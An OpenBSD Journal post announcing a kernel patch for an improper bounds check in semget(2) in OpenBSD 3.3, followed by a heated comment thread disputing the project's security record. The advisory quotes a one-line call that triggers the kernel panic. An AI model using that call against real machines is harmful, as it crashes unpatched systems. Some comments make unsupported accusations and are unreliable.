OpenBSD Journal

y patch_02: OpenBSD 3.3: improper kernel bounds check

Contributed by jose on from the kernel-bugs dept.

jules writes: " An improper bounds check in the semget(2) system call can allow a local user to cause a kernel panic. No privilege escalation is possible, the attack simply runs the kernel out of memory. The bug was introduced in OpenBSD 3.3, previous versions of OpenBSD are unaffected.

The bug has been fixed in OpenBSD-current as well as the 3.3 stable branch. In addition, a patch is available for OpenBSD 3.3:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/002_semget.patch

Credit goes to blexim for finding and reporting the problem.

Start playing with semget(IPC_PRIVATE, -1, 0) :("

Bummer, well, time to upgrade. Thanks go to Todd Miller for the Security-Announce mail.

(Comments are closed)


Comments
  1. By systrace () on http://cowofb0rg.org

    i checked the errata earlier this afternoon...someone mentioned something in irc bout 002 and i was confused since i didnt see it. glad i reloaded and saw it :)

    Comments
    1. By Anonymous Coward () on

      No privilege escalation is possible, the attack simply runs the kernel out of memory.

      Yet.

      Comments
      1. By Anonymous Coward () on

        Oh, you know better then?

      2. By Anonymous Coward () on

        I think the OpenBSD-team will know this just a tiny little bit better than you. no offense.
        And besides, by the time anyone would figure out an way (if at all possible), all our boxes are patched anyway, right?

        3.3 seems to be doing pretty well. Just 2 patches, and 3.4 isn't that far away anymore. 3.3 could easily become the release with the least amount of patches thusfar!

        Comments
        1. By Anonymous Coward () on

          Sure, just like OpenSSH wasn't remotely exploitable.

          Comments
          1. By tedu () on

            wtf said openssh hole wasn't exploitable? the very first announcement said there was an exploit.

            Comments
            1. By Anonymous Coward () on

              Theo did, asshat. Do some reading before making antagonistic comments like this, okay?

              Comments
              1. By Anonymous Coward () on

                He didn't. If he did quote him. Now go play in your garden, and feed your trolls over there. You're useless.

                Comments
                1. By Anonymous Coward () on

                  Are you kidding? He vehemently denied it was remotely exploitable, flamed all who questioned him, only to have Gobbles prove him wrong a week later. This isn't the first time he's covered up security holes, either. Thinking that an exploit that will run the system out of memory and crash the kernel can't be locally exploitable shows your ignorance of both programming and history.

                  Comments
                  1. By earx () on

                    You are wrong !
                    what u are talking about was the apache exploit not openssh.
                    Theo was thinking that apache was not exploitable,
                    and they do an exploit with a local and a remote hole.

                    For openssh theo didn't say it was not exploitable, because they give the remote exploit before release the patch with sometimes to fix it.
                    We just heard the day one about the exploit when theo gave the patch.

                  2. By tedu () on

                    links?

                    Comments
                    1. By earx () on

                      the two exploit was really near but theo was stating about apache:

                      http://www.deadly.org/article.php3?sid=20020622150526

                      Comments
                      1. By Anonymous Coward () on

                        This statement should hold for ANY OpenBSD releases the past 7 years then. The statement doesn't say anything about it only covers the latest release and/or the stable brance.

                        Hence if I installed an OpenBSD 2.8 or event an older release and updated OpenSSH on this machine then there shouldn't bee any remote explorit on it... DON'T THINK SO!

                        http://www.deadly.org/article.php3?sid=20020622150526&mode=flat
                        this only confirms this!!!!

      3. By tedu () on

        you could try reading the code.

  2. By Me!You () on

    The intent of this post is not to start a flame. I just want to question the credibility of the OpenBSD team.

    After my opinion the claim saying: "Only one remote hole in the default install, in more than 7 years!" is not exactly true.

    Now for the proof of this:

    Revision 1.393 of index.html (Mon Dec 9 09:59:06 2002 UTC) more than 7 years

    Revision 1.392 of index.html (Mon Nov 25 22:11:52 2002 UTC) nearly 6 years

    Revision 1.379 of index.html (Sun May 19 18:51:09 2002 UTC) 5 years

    Revision 1.378 of index.html (Wed May 1 16:06:14 2002 UTC) 4 years

    Revision 1.331 of index.html (Sun Apr 29 01:25:12 2001 UTC) 3 years

    From Dec 9 2002 to Nov 25 2002 1 year?
    From Nov 25 2002 to May 19 2002 1 year?
    From May 19 2002 to May 1 2002 1 year?

    From Apr 29 2001 to Dec 9 2002 I roughly get 1 year and 7 month which equals 4 years after to OpenBSD team’s opinion?

    Comments
    1. By Bruno Rohée () bruno@rohee.com on mailto:bruno@rohee.com

      I encourage everyone to actually see the various revisions quoted, in their entirety.

      Basically as long there has not be any hole the duration increased as the time went and once there was the only remote exploit ever the duration has been taken from the start of the project.

      Nothing to hide or to be ashamed of here.

      Comments
      1. By Me!You () on

        This claim first appeared in revision 1.284 (Thu Apr 27 07:17:21 2000) see http://www.openbsd.org/cgi-bin/cvsweb/~checkout~/www/index.html?rev=1.284&conten-type=text/plain

        Is says the following:
        "Three years without a remote hole in the default install!"
        Moreover is also says the following:
        "Two years without a localhost hole in thedefault install!"

        Why did they only say 3 years if is in fact more. There must have been a reason for this.

        I would have liked it if they have continued with the number of local holes as they did for a while.
        http://www.openbsd.org/cgi-bin/cvsweb/~checkout~/www/index.html?rev=1.304&content-type=text/plain

        Maybe the number got to embarrassing or the simply lost track.

        Comments
        1. By Anonymous Coward () on

          Yea, "Over 10 exploitable local kernel holes in the default install!" doesn't give the hyped-up impression they're looking for.

          Comments
          1. By Brad () on

            Where do all of you stupid asshat's come from? Go slide back under your rocks and when you get a clue maybe you can come back.

            Comments
            1. By Anonymous Coward () on

              Typically reaction for the OpenBSD community when the can't defend themselve. We must defend OpenBSD at all cost. We must NOT admit faults and errors, we want the impression of the most SECURE OS at all cost. (must hide security holes...)

              Comments
              1. By Brad () on

                Typical asshat's, having to hide as an AC because you know you're wrong.

                Comments
                1. By Me!You () on

                  Typically, this get to be a flame war. I just wanted to understand why they increased the number of years so fast. I think that it questions the credibility of the OpenBSD team.

                  But no the only thing I get back is that I'm a flamer... thanks guys

                  I can only conclude from this tha the quote:
                  "Only one remote hole in the default install, in more than 7 years!"
                  is't true. Otherwise you would be able to point me to some information about why it was increased so quickly.

                  Comments
                  1. By tedu () on

                    how old is the openbsd project? how many root holes in the default install in that time?

      2. Comments
        1. By Me!You () on

          Thanks!

      3. By Anonymous Coward () on

        selective quoting at its best, indeed. I like the quote on the front page, because it's so easily misquoted by the media and idiots like yourself in OpenBSD's favor. Did we forget the apache exploit? Did we forget the multiple locally exploitable kernel holes? I guess exploit writers don't want to take the extra hour to make their exploit mprotect the binary W|X, and include a local kernel exploit that breaks them out of that inpenetrable "privilege separation", or do they?

        (10 points for the first person who ignores the entire paragraph above and chooses to comment that "OpenBSD never said privilege separation was impenetrable")

        The quote is:
        "Only one remote hole in the default install, in more than 7 years!"

        This tells us the following about OpenBSD's stance on security:
        * They don't care about local/remote DoS conditions (hence why such "reliability" fixes aren't on the security page, yet every other OS seems to consider a DoS a security-related bug)
        * They don't care about client-side bugs that can be exploited remotely (the ftp client bug for instance)
        * They don't care about bugs that don't gain you instant root (remember apache + select)
        * They don't care about exploits in programs that aren't in the default install (essentially nothing bug OpenSSH)
        * They don't care about local bugs at all, since it's clearly ridiculous that anyone would want to have users on an OpenBSD server.

        You can try to deny these facts all you want, but this viewpoint trickles down to the users as is clearly evident on this website.

        Now ask yourself if you want a group of people who care about their own image more than the hyped-up security rip-offs they're dishing out to you to be in charge of your operating system.

        I'll pass.

        Comments
        1. By tedu () on

          "I guess exploit writers don't want to take the extra hour to make their exploit mprotect the binary W|X"

          how?

        2. By Anonymous Coward () on

          Hey, if you hate OpenBSD so much, why are you here? What purpose do you serve? Wouldn't your time be better spent doing something else?

    2. By Anonymous Coward () on

      What can I say.... markething bullshit!

      I want an explanation from Theo and/or other OpenBSD developers before I trust OpenBSD's repotation as the most secure operatingsystem... this is just some very good makrething bullshit!

      Why not get Theo's and other OpenBSD developers comments for once and let this flame about this claim rest. Maybe because they can't say anything except this: "Sorry guys, this OS is not as secure as we would like it to sound it is"

      Comments
      1. By Anonymous Coward () on

        you are not forced to trust openbsd. so better shut up. and btw i suggest that you better learn to spell correctly than trolling around.

        markething? makrething? repotation?

        Comments
        1. By AndrewH () on

          I think the doubters have valid questions re: the credibility of the claims put on OpenBSD. I use and have deep regard for the OS, but I refuse to be romantic or sentimental about it. How about a comment from someone inside the project?

    3. By Anonymous Coward () on

      Revision 1.1 / (download) - annotate - [select for diffs] , Wed Oct 18 08:52:43 1995 UTC (7 years, 10 months ago) by deraadt

Credits

Copyright © - Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]